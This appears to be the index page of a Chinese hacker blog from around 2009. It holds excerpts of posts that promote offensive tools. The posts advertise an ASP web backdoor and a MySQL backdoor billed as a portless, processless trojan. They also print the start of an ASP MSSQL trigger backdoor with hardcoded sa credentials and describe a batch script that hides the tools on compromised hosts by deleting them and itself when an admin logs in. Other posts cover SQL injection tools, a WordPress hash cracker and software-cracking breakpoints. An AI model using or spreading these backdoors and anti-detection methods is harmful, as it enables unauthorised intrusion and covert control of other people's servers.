导航

心动吧黑客BLOG

自发研究:须要多维思想而且要想不可能为可能的人才能做到

[置顶] [原创]心动吧数据库防下载小工具

 这一个文章和我以前发布的一个文章正好成了一个对比(文章连接),如果上一次是茅。那么此次这个就是盾了.为什么这样说?请看一下上一篇的文章。因为上一次是直接修改数据库的防下载表而不会造成数据沉淀在数据库里面。那么换一个思想来讲。假设在数据库当中并没有这一个防下载表。但是却有防下载功能。

例图:

[置顶] 心动吧警告:除20080508外并未发布其他版本

 先要在此感谢evil的提醒,昨天(2009-3-11)时上网后。发现网上有很多新版本的SHELL发布。而且还声称是终结版(我自己都没把自己终结。倒被你终结了).而且采用了加密手段。。现在我将下载回来程序。。打开并分析一下。现在把报告给大家。请慎重使用。。。。

[置顶] [原创]2009-1-18发布新版◆心动吧asp在线◆

心动吧asp在线-不加密加强版-是市面上目前功能最强的.速度最好的一款asp后门

 此内部版修正了:关于无端口的sql连接出错.通用三种SQL连接方式

MsSql 触发器后门

明生注:一段由asp写的代码。。有时合用。只要别人不改sql密码

<%

On Error Resume next

Set conn=Server.CreateObject("ADODB.Connection") 

DSN="driver={SQL Server};Server=(Local)\GSQL;database=baby;uid=sa;pwd=lcx;"

conn.Open DSN

if conn.State=1 then 

response.write("成功") 

ITS_SCAN v1.0测试版(perl coded)

#! /usr/bin/perl    

use IO::Socket;   

use Socket;   

use Net::Ftp;   

...

一个监视终端登陆的批处理文件

主要用于在登陆肉鸡终端的时候,放哨用的。一旦有人连接终端端口(默认端口3389),就发声报警,并对对方是否登陆进行监控。

如果有人登陆终端成功,就自动把指定目录的工具(exe后缀的)循环进行“结束 程序进程”操作,整目录进行删除,然后注销会话并删除自身(不留任何文件)。

 

需要根据环境修改的参数如下:

1.终端端口(本程序为3389)

2.FC的判断结果,需要根据肉鸡

....

phpass_crack: Simple tool for cracking Wordpress hashes

# Trace: 新版本的WordPress和phpbb已经弃用md5,采用phpass加密了(还有其他一些开源WEB程序)。原来DarkC0de上发布了一个phpass.py,是配合字典破解的,这个Phpass_Crack也是。PasswordsPro官方下载的最新版本也已经支持phpass的破解,有字典攻击和暴力破解等方式可选(选择md5(phpbb3) Modul)。

I have written a simple tool for cracking Portable PHP password hashes, which Wordpress uses to hash user passwords

.....

SQLiHelper 2.6注射器

别名:SQLiHelper 2.6 Injector and Dumper for MYSQL & ( added MSSQL support )

转自:TR博客

y0,

 sorry for the NO update, but got time last weekend and tried out the ODBC convert sql injection exploit for MSSQL and implemented it on sqli helper. easy to spot exploitable page, just add a qoute, if you get “Microsoft OLE DB Provider for SQL Server error ‘80040e07′” then its exploitable

 SQLI Helper for MYSQL and MSSQL

.....

六种语言破解比较和常见思路

VB MASM32 VC BCB 易语言 Delphi





VB破解



1、VBExplorer查找按钮事件

2、有提示框则bp rtcMsgBox

3、通过bp __vbaStrCmp/__vbaStrComp/__vbaVarTstEq

bp __vbaStrCmp

bp __vbaStrComp

4、万能断点法(816C24法)

注册验证程序可以用这个断点下断,一般离程序访问注册表很近:

bp __vbaStrToAnsi

5.F12堆栈调用

....

sqlsus 0.2 released

明生注:这是一款用于mysql注入的利用,功能大致 数据库结构,注入SQL查询,下载文件的Web服务器,

上传和控制的后门

From: sativouf <sativouf_at_gmail.com>

Date: Wed, 04 Mar 2009 22:09:21 +0000

 

Hello,

 

A new version of sqlsus has been released and is available at

...

oracle数据库连接器-OraSQL 1.6.1

OraSQL 是一个 oracle 数据库 的sql 工具, 它通过 TCP/IP 协议直接连接到 oracle 数据库,不需要另外安装 oracle 客户端。



OraSQL 完全免费。



主要功能:



* Connect to Oracle 连接到 oracle 数据库,不需要另外安装 oracle 客户端。

* TNSNAMES.ORA 同 oracle 客户端一样的网络配置。

* Execute sql 执行SQL命令。

...

Acunetix Web漏洞扫描器20090211

多达70 %的网站有漏洞,可能导致公司机密数据被盗,如信用卡信息和客户名单.

黑客正在每天24小时,每周七天的专注攻击Web的应用程序--购物车,表格,登入网页,动态页面等。世界上任何不安全的W eb应用层都为他们提供了方便的后端企业数据库.

对于Web应用黑客,防火墙,ssl及锁定服务器等方法是徒劳的。

针对Web应用程序的攻击,是通过80端口 ,他们可以穿过防火墙,操作系统和网络级的安全防护设备,取得您的应用程序和企业的数据。量身定制的Web安全设备往往不够测试出一些还未发现的漏洞,因此容易成为黑客攻击目标。

...

Mysql BackDoorDoor提权工具

Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在WINXP、 WIN2003+MYSQL5.0.X下通过.



[安装]

将Mysql.php传到PHP服务器上,依填上相应的Host、User、Password、DB后,点击"自动安装Mysql BackDoor"

...

分页:[«]1[2][3][»]

日历

<< 2010-7 >>

Sun

Mon

Tue

Wed

Thu

Fri

Sat

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

站内搜索

Copyright ⊙ 2004-2009 心动吧 UrL:ABCXD.CoM All RiGhts Reserved